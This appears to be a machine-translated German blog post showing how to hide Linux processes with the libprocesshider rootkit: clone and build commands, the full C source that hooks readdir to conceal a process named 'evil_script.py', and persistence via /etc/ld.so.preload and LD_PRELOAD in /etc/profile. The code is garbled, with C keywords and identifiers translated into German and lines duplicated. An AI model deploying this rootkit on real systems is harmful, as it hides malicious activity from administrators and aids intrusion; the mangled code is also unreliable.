Eine Methode zum Verbergen von Prozessen unter Linux und die dabei auftretenden Fallstricke

bmfxgkpt-yhd:~# git-Klon https://github.com/gianlucaborello/libprocesshider.git
Klonen in „libprocesshider“ …
remote: Objekte zählen: 26, fertig.
Remote: Gesamt 26 (Delta 0), wiederverwendet 0 (Delta 0), Pack-wiederverwendet 26
Objekte auspacken: 100 % (26/26), erledigt.
bmfxgkpt-yhd:~# cd libprocesshider/
bmfxgkpt-yhd:~/libprocesshider# machen
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
bmfxgkpt-yhd:~/libprocesshider#

#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
/*
 * Jeder Prozess mit diesem Namen wird ausgeschlossen
 */
statischer const char* zu filternder Prozess = "evil_script.py";
/*
 * Einen Verzeichnisnamen mit einem DIR*-Handle abrufen
 */
statische int get_dir_name(DIR* dirp, char* buf, size_t Größe)
{
  int fd = dirfd(dirp);
  wenn(fd == -1) {
    gebe 0 zurück;
  }
  Zeichen tmp[64];
  snprintf(tmp, Größe von(tmp), "/proc/self/fd/%d", fd);
  ssize_t ret = readlink(tmp, Puffer, Größe);
  wenn(ret == -1) {
    gebe 0 zurück;
  }
  buf[ret] = 0;
  Rückgabe 1;
}
/*
 * Holen Sie sich einen Prozessnamen anhand seiner PID
 */
statische int get_process_name(char* pid, char* buf)
{
  wenn(strspn(pid, "0123456789") != strlen(pid)) {
    gebe 0 zurück;
  }
  Zeichen tmp[256];
  snprintf(tmp, Größe von(tmp), "/proc/%s/stat", pid);
  DATEI* f = fopen(tmp, "r");
  wenn(f == NULL) {
    gebe 0 zurück;
  }
  wenn (fgets(tmp, sizeof(tmp), f) == NULL) {
    fclose(f);
    gebe 0 zurück;
  }
  fclose(f);
  int unbenutzt;
  sscanf(tmp, "%d (%[^)]s", &unbenutzt, buf);
  Rückgabe 1;
}
#define DECLARE_READDIR(dirent, readdir) \
statische Struktur dirent* (*original_##readdir)(DIR*) = NULL; \
Struktur dirent* readdir(DIR *dirp) \
{ \
  wenn(original_##readdir == NULL) { \
    original_##readdir = dlsym(RTLD_NEXT, "readdir"); \
    wenn(original_##readdir == NULL) \
    { \
      fprintf(stderr, "Fehler in dlsym: %s\n", dlerror()); \
    } \
  } \
  struct dirent* dir; \
  während(1) \
  { \
    dir = original_##readdir(dirp); \
    if(dir) { \
      char Verzeichnisname[256]; \
      char Prozessname[256]; \
      if(get_dir_name(dirp, dir_name, sizeof(dir_name)) && \
        strcmp(dir_name, "/proc") == 0 && \
        get_process_name(dir->d_name, process_name) && \
        strcmp(Prozessname, zu filternder Prozess) == 0) { \
        weitermachen; \
      } \
    } \
    brechen; \
  } \
  returniere das Verzeichnis; \
}
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

Shell echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
Es wird nicht wirksam. Zu diesem Zeitpunkt müssen wir die Umgebungsvariable Shell bmfxgkpt-yhd konfigurieren: ~ # vi / etc / profile
Fügen Sie eine Zeile hinzu: shell export LD_PRELOAD=/usr/local/lib/libprocesshider.so